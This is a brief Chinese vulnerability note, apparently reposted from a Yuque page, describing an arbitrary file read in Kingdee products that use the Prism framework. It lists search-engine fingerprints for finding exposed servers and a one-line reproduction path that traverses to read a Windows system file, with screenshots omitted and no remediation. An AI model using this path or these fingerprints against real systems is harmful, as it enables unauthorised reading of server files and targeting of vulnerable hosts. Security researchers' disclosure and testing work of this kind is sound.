登录 白背景

金蝶产品任意文件读取

一、漏洞简介

金蝶所有引用prism框架的产品全版本存在任意文件读取漏洞

二、影响版本

  • 目前金蝶所有引用prism框架的产品全版本

三、资产测绘

  • hunterheader="prism_anonymous"||web.title="Welcome to Prism"||web.title="Sisense License Expired"
  • 特征

image.png

四、漏洞复现

/js/c:/windows/win.ini

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/tc0m99r8k3awsoel